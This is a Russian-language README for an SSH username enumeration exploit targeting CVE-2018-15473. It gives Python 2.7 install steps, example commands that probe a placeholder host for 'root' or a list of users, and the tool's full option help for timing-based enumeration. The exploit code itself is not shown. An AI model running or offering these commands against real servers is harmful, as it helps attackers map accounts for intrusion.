
CVE-2018-15473 Exploit
Для использования этого эксплойта потребуется Python 2.7. Установите все модули, перечисленные ниже, в Python 2.7.
Пример: python2 -m pip install numpy python2 -m pip install paramiko python2 -m pip install property
Для проверки одного имени пользователя используйте команду: python ./sshuserenumeration.py -u
Пример: python ./sshuserenumeration.py -u root site.com
Для проверки нескольких имен пользователей с помощью файла списка - используйте команду: python ./sshuserenumeration.py --userlist <name_list.txt>
Пример: python ./sshuserenumeration.py --userlist users.txt site.com
usage: sshuserenumeration.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host
positional arguments: host Укажите адрес SSH сервера, например ip:port или просто ip
optional arguments: -h, --help показать это справочное сообщение и выйти -u USER, --user USER Укажите одно имя пользователя -U USERLIST, --userlist USERLIST Укажите файл со списком пользователей -e, --enumerated Показывать только перечисленных пользователей -s, --silent Как -e, но в stdout будут записаны только имена пользователей (без баннера, без ничего) --bytes BYTES Отправить указанное количество БАЙТ SSH-демону в качестве пароля --samples SAMPLES Собрать указанное количество ОБРАЗЦОВ для расчета временного базового уровня аутентификации несуществующих пользователей --factor FACTOR Используется для вычисления верхней временной границы для перечисления пользователей --trials TRIALS попытаться аутентифицировать пользователя X указанное количество раз (TRIALS) и сравнить среднее время аутентификации с временной границей